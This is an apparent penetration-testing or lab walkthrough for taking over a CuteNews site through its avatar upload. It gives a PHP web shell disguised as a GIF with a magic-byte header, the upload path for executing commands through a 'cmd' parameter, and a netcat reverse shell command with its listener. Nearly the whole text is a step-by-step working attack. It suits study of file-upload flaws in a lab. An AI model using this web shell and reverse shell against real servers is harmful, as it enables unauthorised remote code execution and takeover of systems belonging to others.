Cute News
[1]Navigate to default page and register new user
http://10.10.10.10/index.php
[2]Register bogus E-mail, user and password
[3]If captcha required for registration is malformed or does not show up, find it at .../captcha.php default page
[4]Once logged in, click on personal options and find the โavatarโ tab
[5]Craft a malicious php script โevil.phpโ | using a magic byte will trick the system into interpreting ascii as a .gif file
GIF8;
<?php system($_REQUEST['cmd']) ?>
[6] Upload malicious file ,checkout folder where the malicious code was uploaded
Default location
http://10.10.10.10/uploads/avatar_redcliff_evil.php
[7] Get command execution
http://10.10.10.10/uploads/avatar_redcliff_evil.php?cmd=whoami
[8]Revshell
http://10.10.10.10/uploads/avatar_redcliff_evilx.php?cmd=nc -e /bin/sh 10.10.10.10 1234 (might need to URL encode)
Catch revshell nc -nvlp 1234
Last updated